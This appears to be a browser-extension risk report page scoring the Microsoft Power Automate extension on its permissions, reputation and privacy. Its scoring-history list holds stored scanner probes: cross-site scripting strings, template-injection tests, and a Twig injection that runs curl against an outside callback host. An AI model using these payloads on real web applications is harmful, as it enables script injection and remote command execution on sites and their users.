Netskope Extension Risk

Detail view · rubric v3.6
← Back to catalog

Microsoft Power Automate

ljglajjnnkapghbckkcmodicjhacbfhk
Risk Score
3.26
Risk Level: Low
Recommendation: 🟢 LOW RISK — review
Category Productivity
Installs 11,000,000
Rating 2.1
Last updated 2026-06-26 (3 months ago)
Manifest version MV3
CSP present ✅ yes
Developer flowrpa@microsoft.com
Verified publisher ❌ no
Featured by Google ❌ no
Privacy policy link
Web Store open ↗

Top Risks

  • debugger permission used in code: can intercept all page data, XHR, and DOM across 10M installs
  • nativeMessaging to unrecognized companion app bypasses browser sandbox
  • browsingData + <all_urls> enables full session cookie and history deletion
  • Privacy policy fetch failed — data handling unverifiable for this extension
  • Rating 2.0 indicates significant user-reported dissatisfaction at scale

Evidence

  • debugger_attach confirmed in code crx background.js calls chrome.debugger.attach({tabId}) — highest-risk API, can read all network/DOM.
  • High-capability permission cluster manifest debugger + browsingData + nativeMessaging + scripting + <all_urls> — full-compromise surface.
  • Recognized organization (Microsoft) store developer_domain microsoft.com resolves; brand_mention.confirmed_owner=true; not impersonation.
  • Privacy policy unfetchable api privacy_policy_classification.fetched=false (fetch_error:HTTPError); scored as +10.0 privacy pillar.
  • native_messaging publisher_recognized=true crx Companion app publisher is recognized — +0 penalty on native messaging sanity check.
  • No CVEs, no obfuscation, no external JS hosts crx cve_findings_raw empty; obfuscation_score=0.0; js_external_hosts empty.
  • Capability gate blocks recognized-org discount manifest v2 rule 0b: debugger+browsingData+nativeMessaging+broad host are HIGH-impact; -2.0 org discount blocked.
  • Low rating at massive scale store Rating 2.0 across 10M installs is notable negative signal, though no review red flags matched.

Permissions Breakdown

  • scripting medium Can inject scripts into pages; medium risk on its own.
  • debugger high Full debugger protocol access; can intercept all page data and network traffic.
  • tabs medium Access to tab URLs and metadata across all open tabs.
  • browsingData high Can delete cookies, cache, and history — broad data destruction capability.
  • nativeMessaging high Communicates with native desktop app; escape from browser sandbox.
  • webNavigation medium Observes all navigation events across all URLs.
  • <all_urls> high Host permission covering all URLs; amplifies every other permission.
  • http://*/* high Redundant broad host; covered by <all_urls> — anti-double-count applied.
  • https://*/* high Redundant broad host; covered by <all_urls> — anti-double-count applied.

Pillar Scores

Permissions8.50
Reputation2.00
Network2.00
Webstore2.50
Maintenance0.00
Privacy10.00
Code Quality2.50
CVE Exposure0.00

Scoring History

sssiedn8fc0c604dp727562726963xsx 3.37 Low review 2026-09-06
%22fsssiedxtfdsaxax><!--></ScRiPt>asddsssiedx 3.51 Low review 2026-08-22
&#x27;fsssiedxtfdsaxax><!--></ScRiPt>asddsssiedx 3.33 Low review 2026-08-22
&#x22;fsssiedxt$'sssiedx 3.58 Low review 2026-08-22
<fsssiedxf 3.43 Low review 2026-08-22
<fsssiedx{$"sssiedx 3.39 Low review 2026-08-22
fsssiedx<sssiedx 3.65 Low review 2026-08-22
&#x27;fsssiedxa'sssiedx 3.64 Low review 2026-08-20
3.17 Low review 2026-08-20
$"fsssiedxa&#x22;sssiedx 3.68 Low review 2026-08-20
fsssiedxa$"sssiedx 3.23 Low review 2026-08-20
<fsssiedxa&#x27;sssiedx 3.60 Low review 2026-08-20
<fsssiedxa$"sssiedx 3.77 Low review 2026-08-20
<fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx 3.72 Low review 2026-08-20
<fsssiedxa xx psssiedx 3.64 Low review 2026-08-20
<fsssiedxa'sssiedx 3.77 Low review 2026-08-20
<fsssiedxa$'sssiedx 3.47 Low review 2026-08-20
fsssiedxa<sssiedx 3.54 Low review 2026-08-20
<fsssiedxhfdsaxax><!--></ScRiPt>asddsssiedx 3.87 Low review 2026-08-13
<fsssiedx{ xx psssiedx 3.58 Low review 2026-08-13
%22fsssiedxg xx psssiedx 3.51 Low review 2026-08-13
&#x27;fsssiedxg sssiedx 3.77 Low review 2026-08-13
fsssiedxg<sssiedx 3.31 Low review 2026-08-13
v3.6"onmouseover=f3di(98312)" 3.68 Low review 2026-08-05
dfb[[${98991*97996}]]xca 3.81 Low review 2026-08-05
v3.6&n943555=v966581 3.66 Low review 2026-08-05
sssieddrubricxsx 3.64 Low review 2026-07-31
v3.6</script><script>iMzC(9604)</script> 3.74 Low review 2026-07-29
v3.6"><script>iMzC(9083)</script> 3.56 Low review 2026-07-29
v3.6" Ie7T=iMzC([!+!]) Nav=" 3.15 Low review 2026-07-29
dfb{{98991*97996}}xca 3.06 Low review 2026-07-29
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 3.78 Low review 2026-07-29
<th:t="${dfb}#foreach 3.76 Low review 2026-07-29
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitlyeumqwjaab403f.bxss.me")}} 3.24 Low review 2026-07-29
v3.6 3.26 Low review 2026-06-16

Bookkeeping

Rubric v3.6
Scored at 2026-06-16 07:51
Listing SHA 5f4be66c34df…
Force block — not fired
Score recovered no
Elapsed 24.5s